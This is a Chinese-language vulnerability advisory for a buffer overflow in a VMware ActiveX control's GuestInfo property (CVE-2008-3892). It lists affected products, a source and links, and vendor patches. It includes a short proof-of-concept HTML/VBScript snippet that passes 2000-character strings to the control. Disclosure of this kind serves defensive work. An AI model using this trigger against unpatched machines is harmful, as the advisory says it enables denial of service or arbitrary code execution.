发布日期：2008-06-03
更新日期：2008-06-03

受影响系统：

VMWare Workstation 6.0.x
VMWare Workstation 5.5.x

描述：

---

BUGTRAQ  ID: 29503
CVE(CAN) ID: CVE-2008-3892

VMware虚拟化技术可整合服务器，优化软件生命周期，并通过虚拟机、虚拟服务器和虚拟PC 解决方案提供业务连续性。

VMware Workstation 5.5.x、6.0.x、VMware Player 1.x、2.x、VMware Player 1.x、2.x、VMware Server 1.0.7 build 108231之前版本的COM API中某些ActiveX控件存在缓冲区溢出漏洞，通过调用带有长字符串参数的GuestInfo，并向此调用结果分配较长的字符串值，远程攻击者可利用此漏洞造成拒绝服务或执行任意代码。

<*来源：shinnai （shinnai@autistici.org）
  
  链接：http://xforce.iss.net/xforce/xfdb/43062
        http://www.vmware.com/security/advisories/VMSA-2008-0014.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid='clsid:38DB77F9-058D-4955-98AA-4A9F3B6A5B06' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe buff_1 = String (2000, "a") buff_2 = String (2000, "b") test.GuestInfo (buff_1) = buff_2 End Sub </script>

建议：

---

厂商补丁：

VMWare
------
VMWare已经为此发布了一个安全公告（VMSA-2008-0014）以及相应补丁:

VMSA-2008-0014：VMSA-2008-0014.3

链接：http://www.vmware.com/security/advisories/VMSA-2008-0014.html

补丁下载：
   VMware Workstation 6.0.5
   ------------------------
http://www.vmware.com/download/ws/
   Release notes:
http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html

浏览次数：1780
严重程度：0（网友投票）